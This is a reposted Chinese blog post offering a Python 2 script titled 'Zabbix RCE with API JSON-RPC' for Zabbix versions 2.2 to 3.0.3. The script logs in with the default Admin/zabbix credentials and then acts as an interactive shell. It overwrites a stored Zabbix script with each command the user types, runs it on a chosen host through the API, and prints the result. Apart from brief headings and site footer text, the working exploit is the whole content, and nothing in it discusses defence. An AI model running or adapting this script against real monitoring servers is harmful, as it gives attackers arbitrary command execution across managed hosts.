Zabbix RCE with API JSON-RPC

测试脚本:

 

#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Software Link: http://www.zabbix.com/download.php
# Version: 2.2 - 3.0.3


import requests
import json
import sys


def verify(url,hostid):
    url = url + '/api_jsonrpc.php'    ### Don't edit

    login = 'Admin'        ### Zabbix login
    password = 'zabbix'    ### Zabbix password

    ### auth
    payload = {
           "jsonrpc" : "2.0",
        "method" : "user.login",
        "params": {
            'user': ""+login+"",
            'password': ""+password+"",
        },
           "auth" : None,
        "id" : 0,
    }
    headers = {
        'content-type': 'application/json',
    }

    auth  = requests.post(url, data=json.dumps(payload), headers=(headers))
    auth = auth.json()

    while True:
        cmd = raw_input(':~  ')
        if cmd == "" : print "Result of last command:"
        if cmd == "quit" : break

    ### update
        payload = {
            "jsonrpc": "2.0",
            "method": "script.update",
            "params": {
                "scriptid": "1",
                "command": ""+cmd+""
            },
            "auth" : auth['result'],
            "id" : 0,
        }

        cmd_upd = requests.post(url, data=json.dumps(payload), headers=(headers))

    ### execute
        payload = {
            "jsonrpc": "2.0",
            "method": "script.execute",
            "params": {
                "scriptid": "1",
                "hostid": ""+hostid+""
            },
            "auth" : auth['result'],
            "id" : 0,
        }

        cmd_exe = requests.post(url, data=json.dumps(payload), headers=(headers))
        cmd_exe = cmd_exe.json()
        print cmd_exe["result"]["value"]


if __name__ == '__main__':
    url = sys.argv[1]
    hostid = sys.argv[2]
    verify(url,hostid)

测试截图:

转载于:https://www.cnblogs.com/persuit/p/5718048.html

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值